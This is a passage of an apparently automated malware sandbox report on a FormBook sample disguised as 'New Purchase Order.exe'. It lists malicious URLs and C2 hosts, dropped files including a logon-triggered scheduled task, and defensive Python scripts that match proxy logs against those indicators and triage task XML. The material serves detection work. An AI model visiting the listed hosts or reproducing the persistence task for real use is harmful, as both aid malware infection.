• https://grntt.vercel.app/ | malicious | Unknown | 76.76.21.123
• http://ledgerliveco.com/ | malicious | Unknown | 34.252.40.201

THORDC-AS (IS)
• Scan 00093847.exe | malicious | FormBook | 82.221.128.183
• REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | 82.221.128.183
• botx.x86.elf | malicious | Mirai | 82.221.214.240
• waybill_shipping_documents_original_BL_CI&PL_29_07_2024_000000002024_doc.xls | malicious | GuLoader, Remcos | 192.253.251.227
• msi.dll.dll | malicious | Unknown | 82.221.129.24
• 4Y26u3rWN6.rtf | malicious | GuLoader, Remcos | 192.253.251.227
• waybill_shipping_documents_original_BL_CI&PL_29_07_2024_00000000_doc.xls | malicious | Remcos | 192.253.251.227
• createdthingstobefrankwithmeeverywhere.gIF.vbs | malicious | GuLoader, Remcos | 192.253.251.227
• 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe | malicious | GuLoader, Remcos | 192.253.251.227
• girlfrnd.doc | malicious | GuLoader, Remcos | 192.253.251.227

UNIFIEDLAYER-AS-1 (US)
• payment receipt #8646850983653.exe | malicious | Snake Keylogger, VIP Keylogger | 108.167.142.65
• http://rdr-centru.blogspot.nl/ | malicious | HTMLPhisher | 162.241.24.218
• http://yqp.ive.mybluehost.me/ | malicious | Unknown | 50.6.153.14
• http://yqp.ive.mybluehost.me/en/ | malicious | Unknown | 50.6.153.14
• http://sgk-edevlet.org/ | malicious | Unknown | 50.6.174.229
• https://wsg.xwi.mybluehost.me/s;kl/silver/paiement.php | malicious | Unknown | 162.241.244.55
• https://wsg.xwi.mybluehost.me/s;kl/silver/infospage.php | malicious | Unknown | 162.241.244.55
• https://wsg.xwi.mybluehost.me/s;kl/silver/3dsece.php | malicious | Unknown | 162.241.244.55
• https://wsg.xwi.mybluehost.me/s;kl/silver/3dsec.php | malicious | Unknown | 162.241.244.55
• DOC-66642820.pdf | malicious | Unknown | 162.240.102.206

ACPCA
• Scan 00093847.exe | malicious | FormBook | 162.0.213.94
• Play_VM-NowMarge.mcintireAudiowav012.html | malicious | Phisher | 162.0.217.108
• Play_VM-NowMarge.mcintireAudiowav012.html | malicious | HTMLPhisher | 162.0.217.108
• Play_VM-NowMarge.mcintireAudiowav012.html | malicious | HTMLPhisher | 162.0.217.108
• Factura de proforma.exe | malicious | DBatLoader, FormBook | 162.0.213.72
• Quote #011698.exe | malicious | FormBook | 162.0.213.94
• https://www.google.com/url?q=https://google.com/url?hl%3Den%26q%3Dhttps://google.com/url?q%3D4xNZLlTBeMrz3JgT2S2x%26rct%3Duxx6lWWQSQg3lz6tBGEQ%26sa%3Dt%26esrc%3DLnMkARnwEn0HQZmQHxxK%26source%3D%26cd%3DCFK8mnhX1pEg7TmGNG8P%26cad%3DnNq1ozyXGrC1kDZTqknt%26ved%3DYxsBoVntlMlmOm9lZwVR%26uact%3D%26url%3Damp%252Fsushanta.com%252F21%252F&source=gmail&ust=1725491985982000&usg=AOvVaw2OjIR7ELr3F4rLhFIHiJIH#OvyuiE-SUREMAYYcmVpbmEuYXZpbGFAc3RndXNhLmNvbQ== | malicious | HTMLPhisher | 162.0.209.83
• http://jan47nfhc.3utilities.com/#a7oOTE-SUREJACKam9obi50aGlncGluQGNoZXJva2VlYnJpY2suY29t | malicious | Unknown | 162.0.209.83
• PO#86637.exe | malicious | FormBook | 162.0.213.94
• 709827261526152615.exe | malicious | FormBook | 162.0.213.72
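The contacted-host table and the context tables give two kinds of network indicator: exact hosts and addresses tied to this sample's infrastructure, and a recurring FormBook beacon URL shape (a www. host with a path of exactly four lowercase alphanumeric characters between slashes, such as /wxmz/, /h2bb/ or /pjne/), which the Simda and ELF entries that share an address with it do not follow. The Python below is an added example, not part of the Joe Sandbox report and not a vendor signature: it applies both rules to proxy-log lines. The IOC sets are a hand-picked subset of the hosts and IPs on this page, the log format, client addresses and timestamps are constructed, and the path-shape rule is a heuristic distilled from the URLs listed above.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlsplit

# Subset of the network IOCs on this page: hosts the sample resolved, plus the
# beacon hosts that other FormBook samples in the context tables used.
KNOWN_C2_HOSTS = {
    "www.fvti.cloud", "www.lilibetmed.online", "www.mbwd.store",
    "angelenterprise.biz", "www.dyme.tech", "www.complexity.pub",
    "www.sorriragora.online", "www.bellaflory.online", "www.agoraeubebo.com",
    "www.7hubmt.online", "www.meery.store", "www.syvra.xyz", "www.kryto.top",
}
KNOWN_C2_IPS = {
    "38.55.112.70", "185.134.245.113", "103.42.108.46", "3.33.130.190",
    "162.240.81.18", "54.183.209.210", "162.0.213.94", "13.248.169.48",
}

# Shape shared by every FormBook beacon URL in the context tables: a path of
# exactly four [a-z0-9] characters between slashes (query string, if any, is
# carried separately). Matching this alone is a weak signal, not a verdict.
FORMBOOK_PATH = re.compile(r"^/[a-z0-9]{4}/$")

# Constructed proxy-log layout for the demo: "<timestamp> <client-ip> <method> <url>"
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)$")


def _is_ip(host: str) -> bool:
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def classify_url(url: str) -> dict:
    """Score one URL: 3 = exact IOC hit, 1 = FormBook URI shape only, 0 = nothing."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reasons = []
    if host in KNOWN_C2_HOSTS:
        reasons.append("known-c2-host")
    if _is_ip(host) and host in KNOWN_C2_IPS:
        reasons.append("known-c2-ip")
    if host.startswith("www.") and FORMBOOK_PATH.match(parts.path or "/"):
        reasons.append("formbook-uri-shape")
    score = 3 if any(r.startswith("known-") for r in reasons) else (1 if reasons else 0)
    return {"host": host, "score": score, "reasons": reasons}


def scan_proxy_log(lines) -> list:
    """Return (client, url, verdict) for every parseable line that scores above 0."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # skip malformed lines instead of aborting the whole scan
        verdict = classify_url(m["url"])
        if verdict["score"]:
            hits.append((m["src"], m["url"], verdict))
    return hits


# Constructed log lines: two known FormBook hosts, the shared Amazon address,
# a Simda URL from the same address, and two unrelated www. requests.
SAMPLE_LOG = """\
T+00s 10.0.0.15 GET http://www.fvti.cloud/wxmz/
T+03s 10.0.0.15 POST http://www.bellaflory.online/ituf/?zx=TzUh
T+11s 10.0.0.15 GET http://13.248.169.48/
T+16s 10.0.0.22 GET http://pupydeq.com/login.php
T+21s 10.0.0.22 GET http://www.example.com/abcd/
T+26s 10.0.0.22 GET https://www.example.com/index.html
""".splitlines()

if __name__ == "__main__":
    for src, url, verdict in scan_proxy_log(SAMPLE_LOG):
        print(f"{src} score={verdict['score']} {','.join(verdict['reasons'])} {url}")
```

Alert on the exact-match reasons; the shape rule by itself matches any four-character directory on a www. site and is only useful to widen a hunt once a known host has fired, or to pivot from one beacon to the rest of the rotation (the context tables show single samples cycling through several such hosts). A hit on 13.248.169.48 is likewise weak on its own: the IP context shows Simda Stealer and unrelated ELF samples resolving to the same address, so corroborate with the host name or URI before escalating.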
                        No context
                        No context
                        Process:C:\Users\user\Desktop\New Purchase Order.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1216
                        Entropy (8bit):5.34331486778365
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                        Malicious:true
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Note:this is a .NET CLR usage log in the format of %LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\<exe>.log, written by the 32-bit runtime when a managed executable runs. It records the assemblies the sample loaded (System.Windows.Forms, System.Drawing, System.Core, System.Configuration, System.Xml) and is evidence of execution rather than attacker-authored content. The identical file (same hashes) dropped by ibDqDkseW.exe below carries Malicious:false, so treat the flag as a per-entry verdict, not a property of the file content.
                        Process:C:\Users\user\AppData\Roaming\ibDqDkseW.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1216
                        Entropy (8bit):5.34331486778365
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                        Malicious:false
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2232
                        Entropy (8bit):5.379460230152629
                        Encrypted:false
                        SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//8PUyus:fLHyIFKL3IZ2KRH9Oug8s
                        MD5:5EDBE2AEEFE69FB36ECED2E31AC9386F
                        SHA1:6614C7900E4994E1A3606D22916BE68F701A19D4
                        SHA-256:4275A59302475C8198165F4EB61EA2A88BD12056EA6EE5197C1BF8E6B6A6F9FD
                        SHA-512:CFBAB752BE8CB209B25F2D1AD30E08E5E7ADB2EE5B4CCE98DCFD20B05E4B1CEFFCB6551556B134A2123412C864A8A544701C846F204783D99CB58936DC086A76
                        Malicious:false
                        Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                        Process:C:\Windows\SysWOW64\setupugc.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Note:PowerShell itself writes a file with exactly this content (__PSScriptPolicyTest_<random>.ps1 under %TEMP%) at start-up to test whether AppLocker or WDAC is enforcing script policy. The identical entries that follow (same 60 bytes, same hashes) are one such file per powershell.exe start; they are a side effect of the PowerShell invocations seen in this analysis, not attacker content.
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Users\user\Desktop\New Purchase Order.exe
                        File Type:XML 1.0 document, ASCII text
                        Category:dropped
                        Size (bytes):1575
                        Entropy (8bit):5.110518770952651
                        Encrypted:false
                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaIa5xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTqvv
                        MD5:B24EC33075CBFE3B57A03B5017842D23
                        SHA1:3318F9304E90DD25C4B6F3ED584527EC5645743B
                        SHA-256:3A4FB112F10863985283752B10BF7711047988BB834FAD831F980536176CB644
                        SHA-512:151CFE752AD86BD454774825F66DCFD20389E153B6A8361451A7CEC50167B42BECAF95D58D4A17AB9AA2F9C6802B9447E70609C934520E7957C715AA7831453E
                        Malicious:true
                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                        Process:C:\Users\user\AppData\Roaming\ibDqDkseW.exe
                        File Type:XML 1.0 document, ASCII text
                        Category:dropped
                        Size (bytes):1575
                        Entropy (8bit):5.110518770952651
                        Encrypted:false
                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaIa5xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTqvv
                        MD5:B24EC33075CBFE3B57A03B5017842D23
                        SHA1:3318F9304E90DD25C4B6F3ED584527EC5645743B
                        SHA-256:3A4FB112F10863985283752B10BF7711047988BB834FAD831F980536176CB644
                        SHA-512:151CFE752AD86BD454774825F66DCFD20389E153B6A8361451A7CEC50167B42BECAF95D58D4A17AB9AA2F9C6802B9447E70609C934520E7957C715AA7831453E
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
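The two dropped-file entries above are the same 1,575-byte Task Scheduler definition, first written by the sample and then again by its copy in AppData\Roaming, which is how the "Scheduled temp file as task from temp location" and "Uses schtasks.exe" signatures in the report arise. The following triage script is an added example, not code from the report or from the malware: it reduces such an XML file to the fields that decide whether it is persistence (enabled triggers, principal, run level, command). The XML it parses is constructed from the fields visible in the preview; everything after <RunOnlyIfNetworkAvailable>, the whole <Actions> block, and the command path are assumptions. It also handles the caveat visible in the report itself: the file is classified as ASCII text even though it declares encoding="UTF-16".

```python
"""Triage of a Task Scheduler XML definition of the kind the sample drops.

Added example, not code from the report or the malware. The XML is constructed from the
fields visible in the report's preview; everything after <RunOnlyIfNetworkAvailable> and
the whole <Actions> block, including the command path, are assumptions.
"""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

SAMPLE_TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user-PC\\user</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>false</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\user\\AppData\\Roaming\\ibDqDkseW.exe</Command>
    </Exec>
  </Actions>
</Task>
"""

# Locations a scheduled task should rarely launch from; a triage heuristic (assumption).
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|ProgramData)\\", re.IGNORECASE)


def load_task_xml(raw: bytes) -> ET.Element:
    """Parse a task definition whether or not the bytes match the declared encoding.

    Task definitions exported by the Task Scheduler are UTF-16 with a BOM, but the dropped
    file in this report is ASCII text that still declares encoding="UTF-16". Decode by
    inspecting the bytes, then drop the declaration so the text parses either way.
    """
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")) or b"\x00" in raw[:4]:
        text = raw.decode("utf-16")
    else:
        text = raw.decode("ascii", errors="replace")
    text = re.sub(r"^\s*<\?xml[^>]*\?>", "", text, count=1)
    return ET.fromstring(text.lstrip())


def _text(root: ET.Element, path: str):
    node = root.find(path, TASK_NS)
    return node.text.strip() if node is not None and node.text else None


def triage_task(root: ET.Element) -> dict:
    """Reduce a task definition to the fields that decide whether it is persistence."""
    enabled = []
    triggers = root.find("t:Triggers", TASK_NS)
    for trig in (triggers if triggers is not None else []):
        flag = trig.find("t:Enabled", TASK_NS)
        # <Enabled> is optional in the task schema and defaults to true.
        if flag is None or (flag.text or "").strip().lower() == "true":
            enabled.append(trig.tag.split("}", 1)[1])
    commands = [(c.text or "").strip()
                for c in root.findall("t:Actions/t:Exec/t:Command", TASK_NS)]
    return {
        "author": _text(root, "t:RegistrationInfo/t:Author"),
        "registered": _text(root, "t:RegistrationInfo/t:Date"),
        "run_as": _text(root, "t:Principals/t:Principal/t:UserId"),
        "logon_type": _text(root, "t:Principals/t:Principal/t:LogonType"),
        "run_level": _text(root, "t:Principals/t:Principal/t:RunLevel"),
        "enabled_triggers": enabled,
        "commands": commands,
        "persists_at_logon": "LogonTrigger" in enabled,
        "runs_from_user_writable_path": any(USER_WRITABLE.search(c) for c in commands),
    }


if __name__ == "__main__":
    # As the Task Scheduler would write it (UTF-16 with BOM) ...
    print(triage_task(load_task_xml(SAMPLE_TASK_XML.encode("utf-16"))))
    # ... and as the report actually found it (ASCII carrying a UTF-16 declaration).
    print(triage_task(load_task_xml(SAMPLE_TASK_XML.encode("ascii"))))
```

The same triage applies to the registered task on a live host: export it with `schtasks /Query /TN <name> /XML` and feed the bytes to `load_task_xml`. A LogonTrigger plus a command under AppData is the combination worth acting on; RunLevel LeastPrivilege only says the task runs without elevation, not that it is harmless.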
                        Process:C:\Users\user\Desktop\New Purchase Order.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):693248
                        Entropy (8bit):7.883356763355056
                        Encrypted:false
                        SSDEEP:12288:8o5eOAjw6NO8AfqS2gkpv48GaC9HJTiFFdHODhBDD/I/W4j7CFFzyA9i72l:j6NO8aFz4GaCJTizdH85IeqCF9/kE
                        MD5:9EF9CFFB40D3911E46CB798DAA08B46F
                        SHA1:69BBBC4B8A61FF2FB340F6921C9D66E5F3337CFA
                        SHA-256:A1C124AA85EF07D4C39706DCD012D208576A4B08EC24106FD28D4C5847F9AFC9
                        SHA-512:8546B2A8BD28A9F0B31C938C9891598C36B463F49517D5F04D7C3A912ACE8F52588FFDE32BDDF784F1C745184A93469299F7327A218822AA4E928A3CDF4808C0
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 21%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+L.f..............0..~..........".... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...(}... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B........................H.......x?..X6......L....u...'.............................................}.......}.......}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*V..s....}......(.....*....0............(....s....}.....(....s....}.....#........#........s+...s)...}.....s....}.....s....}.....s....}.....(................#........( .....#......$@( ...(......r...p...#.......?( .....#.......@( ...(......r...p...#.......@( .....#.......@( ...(......r...p...#.......@( .....#......
                        Process:C:\Users\user\Desktop\New Purchase Order.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:true
                        Preview:[ZoneTransfer]....ZoneId=0
                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.883356763355056
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:New Purchase Order.exe
                        File size:693'248 bytes
                        MD5:9ef9cffb40d3911e46cb798daa08b46f
                        SHA1:69bbbc4b8a61ff2fb340f6921c9d66e5f3337cfa
                        SHA256:a1c124aa85ef07d4c39706dcd012d208576a4b08ec24106fd28d4c5847f9afc9
                        SHA512:8546b2a8bd28a9f0b31c938c9891598c36b463f49517d5f04d7c3a912ace8f52588ffde32bddf784f1c745184a93469299f7327a218822aa4e928a3cdf4808c0
                        SSDEEP:12288:8o5eOAjw6NO8AfqS2gkpv48GaC9HJTiFFdHODhBDD/I/W4j7CFFzyA9i72l:j6NO8aFz4GaCJTizdH85IeqCF9/kE
                        TLSH:AEE412B97B1ED556CAC802B40634E3727E350E9EE412D34FCBEEACA778063197C19646
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+L.f..............0..~..........".... ........@.. ....................................@................................
                        Icon Hash:4c9f33415113864d
                        Entrypoint:0x4a9d22
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66DE4C2B [Mon Sep 9 01:15:23 2024 UTC]
                        TLS Callbacks:
